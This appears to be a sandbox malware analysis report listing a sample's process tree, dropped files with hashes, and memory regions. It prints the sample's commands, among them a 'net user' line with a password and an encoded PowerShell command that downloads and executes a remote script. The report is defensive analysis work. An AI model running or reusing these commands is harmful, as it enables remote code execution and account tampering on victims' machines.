C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc yGFc362I1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc yGFc362I2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc yGFc362I3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\8028.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\8028.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RES95F3.tmpMD5
863294897f6932095af97e08ecc6b434
SHA13b307191d85b4660dfb23d1dd878d38dcbb29724
SHA256bcf8f8e7a99ee0529daa81b35eebe848ba042a75cb0f4719c54ad33f8df022bc
SHA5120142df2cf862536b1205432bf91a2cc8fbce437f02dfe0bebce9ab192f6199be02b70aac97322575818ef33e87430987d2e20649a380254d561c80bc6f284a4c
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA137c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA2564c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA51264d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Local\Temp\xmsfcbbl\xmsfcbbl.dllMD5
8ce7ac0f8f6057f9565b991efa154458
SHA1fa72df9e1ff230798c8cdbcf6fbfccbcbc7c3513
SHA25630f8576364af20522c9d12fa5e87b62f4b57e412ee95aa464ab83cc30ffb5dc2
SHA51267d38cb0ff6682746074724ae85cfb2b51856d177cb794095dde0a38373f5d0bea93418e8bf2545e1a24a272d1c6f4c3802752d6d3f37ca7a57ea447523826e2
-
C:\Users\Admin\AppData\Roaming\cawatagMD5
42eabd90d252834ba52568b200e09dfd
SHA1e758217035e67aa46e475e1b5fb79a7168e03078
SHA2561206fbf7e6a98bf2ac11d17648cb27e3aa514774df47b8c071a4473ca4f382c5
SHA5125c7d18f36093e786f06c3c383747d5f49f31677f091e6d0325d48e1d6f3de45218190a97df447a029ca896b79633a5cf7534da1513a4389eaa85b6d648db9312
-
C:\Users\Admin\AppData\Roaming\cawatagMD5
42eabd90d252834ba52568b200e09dfd
SHA1e758217035e67aa46e475e1b5fb79a7168e03078
SHA2561206fbf7e6a98bf2ac11d17648cb27e3aa514774df47b8c071a4473ca4f382c5
SHA5125c7d18f36093e786f06c3c383747d5f49f31677f091e6d0325d48e1d6f3de45218190a97df447a029ca896b79633a5cf7534da1513a4389eaa85b6d648db9312
-
\??\c:\Users\Admin\AppData\Local\Temp\xmsfcbbl\CSC48866E12B7054C7EA746A5145811453.TMPMD5
d5484fcf366ce18b735a66bde9c1a320
SHA14ed0e815e04872633e778764cf3a6b624e94e996
SHA256593ba79923692ec4fbec29cd23e4d6dc75811c96f647c0a7be5efdbe8f2cba7b
SHA51230bfec2ba54393f9a7a0c6497ab472157c43c1e2b0e14699ce42a5ae90e37cf0c6f6ccfb207157d5ef0f4cb56355e03b823a339e33cab170c64f1b329e40acd7
-
\??\c:\Users\Admin\AppData\Local\Temp\xmsfcbbl\xmsfcbbl.0.csMD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\xmsfcbbl\xmsfcbbl.cmdlineMD5
49133c57c4a5f16cb2180b6236955cae
SHA18a9c66292ab437adfe93def05f09af1c21c20fd7
SHA2565a156c7c6f567ddaf39025e0b70400b53ba3c5213abd8d56cab9ba2d840d2d6e
SHA5125b85c987d51fce13854306d168f73ec50debd9e4639139dfefe5a742a9b3466f485f6745abc55d89baa78145ede458be2224b21d22d74c797355bd219cecaa4b
-
\Windows\Branding\mediasrv.pngMD5
ac13d804585a74dc542db4ec94da39df
SHA18642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA25684c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA5120ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.pngMD5
9151c95451abb048a44f98d0afac8264
SHA122f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA2568082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/352-386-0x0000000000000000-mapping.dmp
-
memory/436-130-0x000001DFA6F23000-0x000001DFA6F25000-memory.dmpFilesize
8KB
-
memory/436-131-0x000001DFA6F25000-0x000001DFA6F26000-memory.dmpFilesize
4KB
-
memory/436-132-0x000001DFA6F26000-0x000001DFA6F27000-memory.dmpFilesize
4KB
-
memory/436-129-0x000001DFA6F20000-0x000001DFA6F22000-memory.dmpFilesize
8KB
-
memory/436-124-0x0000000000000000-mapping.dmp
-
memory/436-127-0x000001DFBFC20000-0x000001DFC001F000-memory.dmpFilesize
4.0MB
-
memory/1088-380-0x0000000000000000-mapping.dmp
-
memory/1236-146-0x0000026D19B40000-0x0000026D19B42000-memory.dmpFilesize
8KB
-
memory/1236-134-0x0000000000000000-mapping.dmp
-
memory/1236-141-0x0000026D01790000-0x0000026D01792000-memory.dmpFilesize
8KB
-
memory/1236-142-0x0000026D01790000-0x0000026D01792000-memory.dmpFilesize
8KB
-
memory/1236-143-0x0000026D01790000-0x0000026D01792000-memory.dmpFilesize
8KB
-
memory/1236-144-0x0000026D01790000-0x0000026D01792000-memory.dmpFilesize
8KB
-
memory/1236-145-0x0000026D1BD10000-0x0000026D1BD11000-memory.dmpFilesize
4KB
-
memory/1236-171-0x0000026D19B48000-0x0000026D19B49000-memory.dmpFilesize
4KB
-
memory/1236-147-0x0000026D19B43000-0x0000026D19B45000-memory.dmpFilesize
8KB
-
memory/1236-139-0x0000026D01790000-0x0000026D01792000-memory.dmpFilesize
8KB
-
memory/1236-149-0x0000026D01790000-0x0000026D01792000-memory.dmpFilesize
8KB
-
memory/1236-168-0x0000026D1C6D0000-0x0000026D1C6D1000-memory.dmpFilesize
4KB
-
memory/1236-138-0x0000026D01790000-0x0000026D01792000-memory.dmpFilesize
8KB
-
memory/1236-137-0x0000026D01790000-0x0000026D01792000-memory.dmpFilesize
8KB
-
memory/1236-167-0x0000026D1C340000-0x0000026D1C341000-memory.dmpFilesize
4KB
-
memory/1236-135-0x0000026D01790000-0x0000026D01792000-memory.dmpFilesize
8KB
-
memory/1236-136-0x0000026D01790000-0x0000026D01792000-memory.dmpFilesize
8KB
-
memory/1236-140-0x0000026D1BB60000-0x0000026D1BB61000-memory.dmpFilesize
4KB
-
memory/1236-160-0x0000026D1BCC0000-0x0000026D1BCC1000-memory.dmpFilesize
4KB
-
memory/1236-161-0x0000026D19B46000-0x0000026D19B48000-memory.dmpFilesize
8KB
-
memory/1268-366-0x0000000000000000-mapping.dmp
-
memory/1332-156-0x0000000000000000-mapping.dmp
-
memory/1356-383-0x0000000000000000-mapping.dmp
-
memory/1368-381-0x0000000000000000-mapping.dmp
-
memory/1392-387-0x0000000000000000-mapping.dmp
-
memory/1392-326-0x0000000000000000-mapping.dmp
-
memory/1540-373-0x0000000000000000-mapping.dmp
-
memory/1552-384-0x0000000000000000-mapping.dmp
-
memory/1576-411-0x00000211547E3000-0x00000211547E5000-memory.dmpFilesize
8KB
-
memory/1576-394-0x0000000000000000-mapping.dmp
-
memory/1576-410-0x00000211547E0000-0x00000211547E2000-memory.dmpFilesize
8KB
-
memory/1576-412-0x00000211547E6000-0x00000211547E8000-memory.dmpFilesize
8KB
-
memory/1576-430-0x00000211547E8000-0x00000211547E9000-memory.dmpFilesize
4KB
-
memory/1664-379-0x0000000000000000-mapping.dmp
-
memory/1688-376-0x0000000000000000-mapping.dmp
-
memory/1736-393-0x0000000000000000-mapping.dmp
-
memory/1772-184-0x0000020C4D540000-0x0000020C4D542000-memory.dmpFilesize
8KB
-
memory/1772-186-0x0000020C4D540000-0x0000020C4D542000-memory.dmpFilesize
8KB
-
memory/1772-176-0x0000000000000000-mapping.dmp
-
memory/1772-235-0x0000020C4F458000-0x0000020C4F45A000-memory.dmpFilesize
8KB
-
memory/1772-177-0x0000020C4D540000-0x0000020C4D542000-memory.dmpFilesize
8KB
-
memory/1772-178-0x0000020C4D540000-0x0000020C4D542000-memory.dmpFilesize
8KB
-
memory/1772-179-0x0000020C4D540000-0x0000020C4D542000-memory.dmpFilesize
8KB
-
memory/1772-180-0x0000020C4D540000-0x0000020C4D542000-memory.dmpFilesize
8KB
-
memory/1772-181-0x0000020C4D540000-0x0000020C4D542000-memory.dmpFilesize
8KB
-
memory/1772-183-0x0000020C4D540000-0x0000020C4D542000-memory.dmpFilesize
8KB
-
memory/1772-185-0x0000020C4D540000-0x0000020C4D542000-memory.dmpFilesize
8KB
-
memory/1772-192-0x0000020C4F456000-0x0000020C4F458000-memory.dmpFilesize
8KB
-
memory/1772-189-0x0000020C4F453000-0x0000020C4F455000-memory.dmpFilesize
8KB
-
memory/1772-190-0x0000020C4D540000-0x0000020C4D542000-memory.dmpFilesize
8KB
-
memory/1772-188-0x0000020C4F450000-0x0000020C4F452000-memory.dmpFilesize
8KB
-
memory/2040-390-0x0000000000000000-mapping.dmp
-
memory/2092-117-0x0000000000030000-0x0000000000038000-memory.dmpFilesize
32KB
-
memory/2092-118-0x00000000001D0000-0x00000000001D9000-memory.dmpFilesize
36KB
-
memory/2092-119-0x0000000000400000-0x0000000002EF4000-memory.dmpFilesize
43.0MB
-
memory/2272-477-0x0000000000000000-mapping.dmp
-
memory/2304-375-0x0000000000000000-mapping.dmp
-
memory/2412-327-0x0000000000000000-mapping.dmp
-
memory/2412-388-0x0000000000000000-mapping.dmp
-
memory/2548-370-0x0000000000000000-mapping.dmp
-
memory/2548-476-0x0000000000000000-mapping.dmp
-
memory/2628-328-0x0000000000000000-mapping.dmp
-
memory/3068-120-0x0000000000CE0000-0x0000000000CF6000-memory.dmpFilesize
88KB
-
memory/3068-133-0x0000000000DB0000-0x0000000000DC6000-memory.dmpFilesize
88KB
-
memory/3108-385-0x0000000000000000-mapping.dmp
-
memory/3168-374-0x0000000000000000-mapping.dmp
-
memory/3424-153-0x0000000000000000-mapping.dmp
-
memory/3496-369-0x0000000000000000-mapping.dmp
-
memory/3564-389-0x0000000000000000-mapping.dmp
-
memory/3568-264-0x0000000000000000-mapping.dmp
-
memory/3568-308-0x000002AE26C56000-0x000002AE26C58000-memory.dmpFilesize
8KB
-
memory/3568-309-0x000002AE26C58000-0x000002AE26C5A000-memory.dmpFilesize
8KB
-
memory/3568-277-0x000002AE26C53000-0x000002AE26C55000-memory.dmpFilesize
8KB
-
memory/3568-276-0x000002AE26C50000-0x000002AE26C52000-memory.dmpFilesize
8KB
-
memory/3588-365-0x0000000000000000-mapping.dmp
-
memory/3696-382-0x0000000000000000-mapping.dmp
-
memory/3796-372-0x0000000000000000-mapping.dmp
-
memory/3808-371-0x0000000000000000-mapping.dmp
-
memory/3808-392-0x0000000000000000-mapping.dmp
-
memory/3892-391-0x0000000000000000-mapping.dmp
-
memory/3948-123-0x0000000000400000-0x0000000002EF4000-memory.dmpFilesize
43.0MB
-
memory/4064-274-0x000001D87DEE6000-0x000001D87DEE8000-memory.dmpFilesize
8KB
-
memory/4064-221-0x0000000000000000-mapping.dmp
-
memory/4064-236-0x000001D87DEE0000-0x000001D87DEE2000-memory.dmpFilesize
8KB
-
memory/4064-275-0x000001D87DEE8000-0x000001D87DEEA000-memory.dmpFilesize
8KB
-
memory/4064-237-0x000001D87DEE3000-0x000001D87DEE5000-memory.dmpFilesize
8KB